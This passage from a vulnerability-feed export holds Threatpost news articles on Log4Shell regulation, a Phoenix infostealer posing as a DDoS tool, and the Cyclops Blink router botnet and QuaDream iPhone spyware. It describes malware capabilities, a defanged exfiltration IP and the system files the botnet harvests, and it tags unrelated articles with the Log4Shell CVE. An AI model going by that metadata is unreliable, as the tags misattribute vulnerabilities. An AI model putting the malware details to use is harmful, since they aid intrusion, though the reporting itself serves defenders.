Log4Shell or whatever similar, known vulnerabilities crop up, it said.\n\nThe FTC advised companies to use [guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) from the Cybersecurity and Infrastructure Security Agency (CISA) to check if they\u2019re using Apache\u2019s Log4j logging library, which is at the heart of the cluster of vulnerabilities known as [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>).\n\nCompanies that find that they are using Log4j should do the following, CISA recommended:\n\n * Update your Log4j software package to the [most current version](<https://logging.apache.org/log4j/2.x/security.html>).\n * Consult [CISA guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to mitigate this vulnerability.\n * Ensure remedial steps are taken to ensure that your company\u2019s practices do not violate the law. Failure to identify and patch instances of this software may violate [the FTC Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>).\n * Distribute this information to any relevant third-party subsidiaries that sell products or services to consumers who may be vulnerable.\n\nOn Dec. 17, CISA issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23. Federal agencies were given five more days \u2013 until Dec. 28 \u2013 to report Log4Shell-affected products, including vendor and app names and versions, along with what actions have been taken \u2013 e.g. 
updated, mitigated, removed from agency network \u2013 to block exploitation attempts.\n\nCISA provides a [dedicated page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for the Log4Shell flaws with patching information and has released a [Log4j scanner](<https://twitter.com/cisagov/status/1473401212468932609?s=12>) to hunt down potentially vulnerable web services.\n\n## The Log4j Fire Rages Unabated\n\nThe initial flaw \u2013 [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 was discovered on Dec. 9 and came under attack within hours. As of Dec. 15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit what became a trio of bugs:\n\n 1. The Log4Shell remote-code execution (RCE) bug that spawned [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and which led to \u2026\n 2. The [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch. Plus, there was \u2026\n 3. [A third bug](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>), a DoS flaw similar to Log4Shell in that it also affected the logging library. 
It differed in that it concerned Context Map lookups rather than the Java Naming and Directory Interface (JNDI) lookups to an LDAP server involved in CVE-2021-44228, the Log4Shell lookups that let attackers execute whatever code the server returns.\n\nAt this point, the Conti ransomware gang has had a [full attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) in place for weeks.\n\nIn a Monday update, Microsoft said that the end of December [brought no relief](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>): The company observed state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through month\u2019s end. \u201cMicrosoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities,\u201d Microsoft security researchers warned.\n\n\u201cExploitation attempts and testing have remained high during the last weeks of December. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,\u201d the researchers said.\n\n## Hunting Down Log4j\n\nOne of the most challenging aspects of responding to the Log4j vulnerability is simply identifying the devices in an organization where Log4j is used. The word \u201cubiquitous\u201d has applied since the get-go.\n\n\u201cSince it is a cross-platform, widely used software library, there is incredible diversity in where and how it is deployed: it can be an application package installed by itself, bundled with another application package as just another file on disk or embedded in another application with no visible artifact,\u201d J.J. 
Guy, co-founder and CEO at Sevco Security, told Threatpost on Wednesday.\n\nHe added, \u201cEven worse, it is used in everything from cloud-managed services to server applications and even fixed-function, embedded devices. That internet-connected toaster is very likely vulnerable to Log4Shell.\u201d\n\nWe\u2019re just in the middle of the triage phase now, Guy said, where basic tools, such as systems-management or software-management tools that check for the file on disk, can provide initial triage.\n\nOne question: What\u2019s the inventory of equipment that still needs to be triaged?\n\n\u201cFor organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage results requires they report not only the machines that have been triaged but also how many are pending triage,\u201d Guy remarked. \u201cReporting the \u2018pending triage\u2019 statistic requires a complete asset inventory, including which machines have been successfully triaged.\u201d\n\nHe called this \u201cone of the larger hidden challenges\u201d in every organization\u2019s response, given that so few have a comprehensive asset inventory, \u201cdespite the fact it has been a top requirement in every security compliance program for decades.\u201d\n\n[_Image courtesy of Quince Media._](<https://commons.wikimedia.org/wiki/File:3D_illustration_image_of_a_gavel_-_auction_hammer_-_free_to_use_in_your_projects_07.jpg>) [_Licensing details_](<https://creativecommons.org/licenses/by-sa/4.0/>).\n\n_**Password Reset: [On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password-security strategy built for today\u2019s threats. 
This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. **[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T19:00:03", "type": "threatpost", "title": "FTC to Go After Companies that Ignore Log4j", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T19:00:03", "id": "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "href": "https://threatpost.com/ftc-pursue-companies-log4j/177368/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T14:53:17", "description": "Looking to cyber-hassle Russia, 
Ukrainian sympathizers? Be careful \u2014 malware is making the rounds, disguised as a pro-Ukraine cyber-tool that will turn around and bite you instead, researchers are warning.\n\nIn a Wednesday [threat advisory](<https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html>), Cisco Talos described a campaign it\u2019s observed in which a threat actor was offering a supposed distributed denial-of-service (DDoS) tool on Telegram that\u2019s purportedly meant to pummel Russian websites.\n\nIn truth, the file is actually the Phoenix infostealer that\u2019s after credentials and cryptocurrency info, according to researchers.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\nResearchers shared one such Telegram come-on, shown below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10114749/infostealer-disguised-as-Russian-attack-tool-e1646930888523.jpg>)\n\nInfostealer disguised as a Russian attack tool on Telegram. 
Source: Cisco Talos.\n\n\u201cWe are glad to remind you about the software we use to attack Russian sites!\u201d the message burbled, waiting to jump on unsuspecting users so as to bleed them of cryptocurrency stored in wallets and MetaMask (cryptocurrency wallet software commonly associated with non-fungible tokens [NFTs]).\n\n## Cyber-Warzone Flooded with New Threats, Hacker Newbies\n\nThe malware dressed in sheep\u2019s clothing is just one more wrinkle in the cyber-threat landscape \u2013 a landscape that has been undergoing seismic shifts leading up to and during Russia\u2019s invasion of Ukraine. The crisis has brought both new threats and an influx of actors \u201cof varying skill,\u201d Cisco said.\n\nFor example, the cyber-warzone has entailed the Conti ransomware gang\u2019s secrets [getting spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) (including a [decryptor and TrickBot code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>)) by a Ukrainian security researcher (per [KrebsOnSecurity](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>), citing Alex Holden, the Ukrainian-born founder of the Milwaukee-based cyber intelligence firm Hold Security), a pro-Ukrainian member; furious phishing campaigns [launched](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) against Ukraine and [those aiding](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) Ukrainian refugees; the novel FoxBlade [trojan](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>); DDoS [attacks](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against Ukraine\u2019s military and economy; campaigns using multiple destructive [wipers](<https://threatpost.com/destructive-wiper-ukraine/177768/>); hackers affiliating themselves with 
the Anonymous collective [hijacking](<https://www.taiwannews.com.tw/en/news/4466470>) Russian cameras; and more.\n\n\u201cMany of these changes have been brought about by the rise in attacks being [outsourced](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) to sympathetic people on the internet, which brings about its own unique challenges and threats,\u201d Cisco [outlined](<https://blog.talosintelligence.com/2022/03/ukraine-update.html>). The threat advisory referenced a [tweet](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) exhorting people to join an IT army to fight on the cyber-front.\n\n> We are creating an IT army. We need digital talents. All operational tasks will be given here: <https://t.co/Ie4ESfxoSn>. There will be tasks for everyone. We continue to fight on the cyber front. The first task is on the channel for cyber specialists.\n> \n> \u2014 Mykhailo Fedorov (@FedorovMykhailo) [February 26, 2022](<https://twitter.com/FedorovMykhailo/status/1497642156076511233?ref_src=twsrc%5Etfw>)\n\nSoldiers on the frontlines get shot at, of course, and soldiers on the cyber-frontlines run the risk of getting arrested. After all, no matter how noble the hacking cause, it\u2019s still potentially illegal, Cisco pointed out.\n\n## \u2018Legitimate\u2019 Disbalancer Liberator DDoS Tool\n\nThe malware in the Telegram message brands itself as a \u201cDisbalancer\u201d .ZIP file. 
There is, in fact, a group called \u201cdisBalancer\u201d that distributes a \u201clegitimate\u201d DDoS attack tool called, ironically enough, Liberator, Cisco found \u2013 a tool for waging cyberwar against \u201cRussian propaganda websites.\u201d\n\n\u201cA quick look at disBalancer\u2019s website shows that the actor uses similar language to the malicious message on Telegram\u2026and promises to target Russian sites with the stated goal of helping to \u2018liberate\u2019 Ukraine,\u201d according to Cisco\u2019s writeup.\n\nThe security company offered a screenshot of the brandjacking Disbalancer Liberator website, shown below. As Cisco pointed out, there\u2019s a typo in the group\u2019s name, which is rendered as \u201cdisBalancher.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10135135/Disbalancer-Liberator-e1646938312137.png>)\n\nScreenshot from Disbalancer Liberator website. Source: Cisco Talos.\n\ndisBalancer\u2019s tool \u2013 Disbalancer.exe \u2013 is sincerely meant to DDoS Russia. The infostealer campaign, on the other hand, is based on a dropper disguised as that tool. It\u2019s protected with ASProtect, Cisco said, a known packer for Windows executables.\n\n\u201cIf a researcher tries to debug the malware execution, it will be confronted with a general error. The malware, after performing the anti-debug checks, will launch Regsvcs.exe, which is included along with the .NET framework,\u201d according to the writeup. \u201cIn this case, the regsvcs.exe is not used as a living off the land binary (LoLBin). It is injected with the malicious code, which consists of the Phoenix information stealer.\u201d\n\nThe actors behind this campaign aren\u2019t the newbies flocking to the front lines. 
Rather, they\u2019ve been distributing infostealers since at least November, Cisco said, as evidenced by the fact that the infostealer exfiltrates stolen info to a remote IP address \u2013 in this case, a Russian IP \u2014 95[.]142.46.35 \u2014 on port 6666.\n\nThat IP/port pair \u201chas been distributing infostealers since at least November 2021,\u201d researchers said. The longevity of the pairing reinforces researchers\u2019 belief that these are experienced actors at work, taking advantage of the Ukraine calamity, rather than threat actors new to the scene.\n\nThe infostealer is hoovering up a broad array of information, Cisco said. \u201cThe .ZIP file provided in the Telegram channel contains an executable, which is the infostealer,\u201d according to the report. \u201cThe infostealer gathers information from a variety of sources, including web browsers like Firefox and Chrome and other locations on the filesystem for key pieces of information.\u201d\n\nThe researchers provided a deobfuscated screen capture, replicated below, showing how the pilfered info is sent with a simple base64 encoding. The screen grab shows the breadth of information being pulled off of infected systems, including a large number of crypto wallets and information on MetaMask. \u201cA .ZIP file of the stolen data is also uploaded to the server, completing the compromise,\u201d Cisco said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10142913/Sample-data-exfiltrated-by-infostealer-e1646940569947.png>)\n\nSample data exfiltrated to server. Source: Cisco Talos.\n\n## Don\u2019t Eat That: You Don\u2019t Know Where It\u2019s Been\n\nThe infostealer masquerading as a DDoS tool to attack Russian targets is just one example of the many ways cybercriminals are milking the invasion for social-engineering sustenance, exploiting sympathizers on both sides. 
\u201cSuch activity could take the form of themed email lures on news topics or donation solicitations, malicious links purporting to host relief funds or refugee support sites, malware masquerading as security defensive or offensive tools, and more,\u201d researchers suggested.\n\nIn this case, cybercriminals were distributing an infostealer in an apparently profit-motivated campaign. It could have been worse, though, according to the report: \u201cIt could have just as easily been a more sophisticated state-sponsored actor or privateer group doing work on behalf of a nation-state.\u201d\n\nExpect this type of situational exploitation to continue and to diversify, Cisco predicted: \u201cThe global interest in the conflict creates a massive potential victim pool for threat actors and also contributes to a growing number of people interested in carrying out their own offensive cyber operations.\u201d\n\nCisco reminded users to essentially avoid eating food that\u2019s been dropped on the floor. You don\u2019t know where that stuff\u2019s been, researchers warned, so be wary of installing software \u201cwhose origins are unknown, especially software that is being dropped into random chat rooms on the internet.\u201d\n\nAs always, carefully inspect suspicious emails before opening attachments, Cisco advised, and validate software or other files before downloading.\n\n031122 0934 UPDATE: Corrected identification of Conti leaker.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T19:54:00", "type": "threatpost", "title": "Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T19:54:00", "id": "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "href": "https://threatpost.com/malware-posing-russia-ddos-tool-bites-pro-ukraine-hackers/178864/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T17:24:48", "description": "The modular botnet known as Cyclops Blink, linked to the same advanced persistent threat (APT) behind the [NotPetya wiper 
attacks](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), is expanding its device targeting to include ASUS routers.\n\nFurther, it\u2019s likely that the botnet\u2019s purpose is far more sinister than the average [Mirai-knockoff\u2019s penchant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) for distributed denial-of-service (DDoS) attacks.\n\nThat\u2019s the word from Trend Micro researchers, who noted that Cyclops Blink casts a wide net in terms of the owners of the devices it chooses to infect, with no specific focus on high-value government or diplomatic entities. While that\u2019s out of step with typical APT behavior, researchers said that it\u2019s likely the botnet will be used as persistent infrastructure for mounting further attacks on high-value targets, and as such is being distributed indiscriminately for maximum effect.\n\n\u201cIt should be noted that these victims do not appear to be evidently valuable targets for either economic, military or political espionage,\u201d according to the firm\u2019s analysis. \u201cFor example, some of the live command-and-control servers (C2s) are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States.\u201d\n\nCyclops Blink itself has been around since 2019, initially looking to infect WatchGuard Firebox devices, according to a [February analysis (PDF)](<https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf>) performed by the UK\u2019s National Cyber Security Centre (NCSC). To further its goal of widescale infections, ASUS routers are now on the menu, Trend Micro noted, with the latest variant incorporating a fresh module tailored to the vendor\u2019s devices.\n\n\u201cOur research was carried out on the RT-AC68U, but other ASUS routers such as RT-AC56U might be affected as well,\u201d researchers said. 
\u201cOur investigation shows that there are more than 200 Cyclops Blink victims around the world. Typical countries of infected WatchGuard devices and ASUS routers are the United States, India, Italy, Canada and a long list of other countries, including Russia.\u201d\n\n## **A Sinister Purpose?**\n\nCyclops Blink is the handiwork of the Russian-speaking Sandworm APT (a.k.a. Voodoo Bear or TeleBots), according to Trend Micro \u2013 the same group that\u2019s been [linked to a host of](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) very high-profile state-sponsored attacks, as well as the VPNFilter internet-of-things (IoT) botnet.\n\n\u201cSandworm was also responsible for\u2026the [2015 and 2016 attacks on the Ukrainian electrical grid](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), the 2017 NotPetya attack, the 2017 French presidential campaign, the [2018 Olympic Destroyer attack](<https://threatpost.com/olympic-destroyer-malware-behind-winter-olympics-cyberattack-researchers-say/129918/>) on the Winter Olympic Games and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW),\u201d researchers noted in a [Thursday analysis](<https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html>).\n\nInternet routers have been a favorite target for building out botnets for many years, thanks to \u201cinfrequency of patching, the lack of security software and the limited visibility of defenders\u201d when it comes to these devices, as Trend Micro put it. More often than not, such botnets are used to carry out DDoS attacks; but in Cyclops Blink\u2019s case, the motives are less obvious.\n\n\u201cThe purpose of this botnet is still unclear: Whether it is intended to be used for DDoS attacks, espionage or proxy networks remains to be seen,\u201d researchers said. 
\u201cBut what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.\u201d\n\nIn fact, some of the infected devices that researchers observed have been compromised for more than two and a half years, with some set up as stable C2 servers for other bots.\n\nIt is thus likely, the researchers speculated, that Cyclops Blink is destined for bigger horizons than denial of service.\n\n\u201cThe more routers are compromised, the more sources of powerful data collection \u2014 and avenues for further attacks \u2014 become available to attackers,\u201d according to the analysis, which raised the specter of \u201ceternal botnets.\u201d\n\n\u201cOnce an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying or anything else that the attacker wants to do,\u201d researchers warned. \u201cThe underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.\u201d\n\nGiven Sandworm\u2019s track record, it\u2019s wise to expect the worst, the firm noted.\n\n\u201cSandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best,\u201d researchers said.\n\n## **A Few Technical Specifics on a New Botnet Variant**\n\nCoded in the C language, Cyclops Blink relies on hard-coded TCP ports to communicate with a range of command-and-control servers (C2s), according to the analysis. 
For each port, it creates a rule in the Netfilter Linux kernel firewall to allow outbound communication to it.\n\nOnce it\u2019s made contact, the malware initializes an OpenSSL library, and its core component then starts a series of hard-coded modules.\n\n\u201cCommunication with the modules is performed via pipes,\u201d according to Trend Micro. \u201cFor each hard-coded module, the malware creates two pipes before executing them in their own child processes.\u201d\n\nThe malware then pushes various parameters to the modules, which in turn respond with data that the core component encrypts with OpenSSL functions before sending it to the C2 server.\n\n\u201cThe data is encrypted using AES-256 in cipher block chaining (CBC) mode with a randomly generated 256-bit key and 128-bit initialization vector (IV). It is then encrypted using a hard-coded RSA-2560 (320-bit) public key unique to each sample,\u201d according to the analysis. \u201cThe C2 server must have the corresponding RSA private key to decrypt the data.\u201d\n\nResearchers added, \u201cTo send data to the C2 server, the core component performs a TLS handshake with a randomly chosen C2 server at a random TCP port, both of which are from a hard-coded list.\u201d\n\nInitially, the core component sends a list of supported commands to the C2 server and then waits to receive one of the commands back. 
These can be aimed at the core component itself or to one of its modules, according to the writeup.\n\nIf a command targets the core component, it can be one of the following:\n\n * Terminate the program\n * Bypass the data-sending interval and send data to C2 servers immediately\n * Add a new C2 server to the list in memory\n * Set time to send the next packet to the C2 server\n * Set time to send the next packet to the C2 server\n * Add a new module (an ELF file should be received following the command)\n * Reload the malware\n * Set the local IP address parameter\n * Set a new worker ID\n * Set an unknown byte value\n * Resend configuration to all running modules\n\nAs for the commands meant for the modules, the latest variant studied by Trend Micro now includes \u201cAsus (0x38),\u201d meant to activate a brand-new module built to infect ASUS routers.\n\n**Targeting ASUS Routers**\n\nThe ASUS module is built to access and replace a router\u2019s flash memory, thus enslaving it to the botnet, researchers explained.\n\n\u201cThis module can read and write from the devices\u2019 flash memory,\u201d they said. 
\u201cThe flash memory is used by these devices to store the operating system, configuration and all files from the file system.\u201d\n\nCyclops Blink reads 80 bytes from the flash memory, writes them to the main pipe, and then waits for a command with the data needed to replace the content.\n\n\u201cAs the flash memory content is permanent, this module can be used to establish persistence and survive factory resets,\u201d researchers explained.\n\nA second module, straightforwardly called \u201csystem reconnaissance (0x08),\u201d is responsible for gathering various data from the infected device and sending it to the C2 server.\n\nSpecifically, it harvests:\n\n * The Linux version of the device\n * Information about the device\u2019s memory consumption\n * The SSD storage information\n * The content of the following files:\n   * /etc/passwd\n   * /etc/group\n   * /proc/mounts\n   * /proc/partitions\n * Information about network interfaces\n\nA third module, \u201cfile download (0x0f),\u201d can download files from the internet using DNS over HTTPS (DoH).\n\nTrend Micro noted that the ASUS module is likely not the only new module that will emerge for the botnet. After all, Sandworm\u2019s previous botnet, VPNFilter, targeted a wide range of router vendors, including ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL and ZTE.\n\n\u201cWe have evidence that other routers are affected too, but as of reporting, we were not able to collect Cyclops Blink malware samples for routers other than WatchGuard and ASUS,\u201d according to the analysis. \u201cBased on our observation, we strongly believe that there are more targeted devices from other vendors. 
This malware is modular in nature, and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.\u201d\n\n## **How to Defend Against Becoming a Botnet Victim**\n\nAs with other botnets, organizations can protect themselves from Cyclops Blink attacks by falling back on basic security hygiene, Trend Micro noted, including strong passwords, use of a virtual private network (VPN) and regular firmware patching. Most successful compromises are the result of default or weak password use or the exploitation of known vulnerabilities.\n\nIf an organization\u2019s devices have been infected with Cyclops Blink, researchers said that the best course of action is to replace the infected router with a new one, given the malware\u2019s prodigious persistence capabilities.\n\n\u201cIt is best to get a new router,\u201d they explained. \u201cPerforming a factory reset might blank out an organization\u2019s configuration, but not the underlying operating system that the attackers have modified. If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible. However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor. In such cases, an average user would not have the ability to fix a Cyclops Blink infection.\u201d\n\n_**Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T17:17:17", "type": "threatpost", "title": "Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T17:17:17", "id": "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "href": "https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "ForcedEntry \u2013 the exploit of a zero-click iMessage zero day that [circumvented](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>) 
Apple\u2019s then-brand-new BlastDoor security feature starting a year ago \u2013 was picked apart not just by NSO Group with its Pegasus spyware but also by a newly uncovered, smaller smartphone-hacking toolmaker named QuaDream.\n\nReuters [published](<https://www.reuters.com/technology/exclusive-iphone-flaw-exploited-by-second-israeli-spy-firm-sources-2022-02-03/>) details on QuaDream last week. The outlet relied on input from five sources familiar with the matter, plus a look at two QuaDream product brochures dating from 2019 and 2020 that its reporters got their hands on.\n\nThree people familiar with the matter told Reuters that QuaDream and NSO Group have shared employees over the years. Two sources also said that QuaDream and NSO Group came up with the iPhone exploit techniques on their own, separately \u2014 as opposed to collaborating.\n\nIn September, Citizen Lab [published details about having captured](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) NSO Group\u2019s ForcedEntry exploit in the wild, though its security researchers believe that it was first used in February 2021. Apple had just introduced BlastDoor, a structural improvement in iOS 14 meant to block message-based, zero-click exploits \u2013 a month prior to when NSO Group is believed to have started using it.\n\nMonths earlier, in August, the privacy watchdog identified nine Bahraini activists whose iPhones were hacked with NSO Group\u2019s Pegasus spyware between June 2020 and last February. 
Some of the activists were attacked with what Citizen Lab came to call the 2021 ForcedEntry exploit, while others\u2019 devices were remotely exploited and infected with spyware by [the 2020 KISMET exploit](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>): another zero-click iMessage exploit.\n\nBlastDoor was supposed to prevent this type of attack by acting as what Google Project Zero\u2019s Samuel Gro\u00df called at the time a \u201ctightly sandboxed\u201d service responsible for \u201calmost all\u201d of the parsing of untrusted data in iMessages. The ForcedEntry exploit managed to circumvent BlastDoor by targeting Apple\u2019s image rendering library: a sophisticated attack that was effective against Apple iOS, macOS and watchOS devices.\n\n## QuaDream Got in on the Fun\n\nQuaDream was allegedly in on the Bahraini malware infections, it turns out, including an attack on one activist living in London at the time.\n\nAccording to Reuters, the firm was founded in 2016 by Ilan Dabelstein, a former Israeli military official, and by two former NSO employees, Guy Geva and Nimrod Reznik. Reuters\u2019 sources for QuaDream\u2019s background were Israeli corporate records and two people familiar with the business.\n\nIts 2016 founding means that QuaDream has spent more than five years hacking iPhones and other iGadgets, prying them open so as to monitor calls and get access to users\u2019 microphones and cameras in real time. 
